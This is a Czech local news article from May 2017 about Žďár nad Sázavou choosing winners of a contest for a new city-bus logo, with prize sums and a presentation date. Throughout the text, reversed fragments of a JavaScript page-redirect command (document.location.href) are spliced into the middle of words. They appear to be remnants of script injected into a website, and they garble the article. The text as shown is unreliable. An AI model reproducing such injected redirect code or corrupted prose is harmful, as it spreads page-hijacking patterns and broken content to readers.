Rainbow page separator

Komise vybrala vítěze veřejné soutěže na nové logo MHD

Pátek, 5. května 2017

Žďár nad Sázavou / Nejlepší návrhy od celkem patnácti účastníků soutěže, kterou žďárská radnice vypsala na nové logo pro městskou hromadnou dopravu, jež le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos slaví 60 let svého trvání a od 1. července dozná změnu ve vedení i značení au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusových linek, vybrala hodnotitelská komise. Konečné pořadí pak určili radní. Vítězem se stal návrh Milana Kozla, na druhém místě se umístil návrh logotypu Ivy Utinkové, na třetím Václava Černíka.
„První mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bude ohodnoceno částkou osm tisíc korun, druhé částkou čtyři tisíce korun a třetí mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to částkou ve výši tisíc korun,“ připomněla mluvčí radnice Nikola Adlerová. Vítězný návrh ještě může být podle potřeby upraven a obyvatelům Žďáru bude včetně dalších novinek týkajících se změn v MHD představen 16. května v 17 hodin v jídelně základní školy v Palachově ulici. Použití nového loga a sloganu se předpokládá především na tiskových materiálech, jízdních řádech, reklamních tabulích, na internetu a rovněž na au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusech MHD.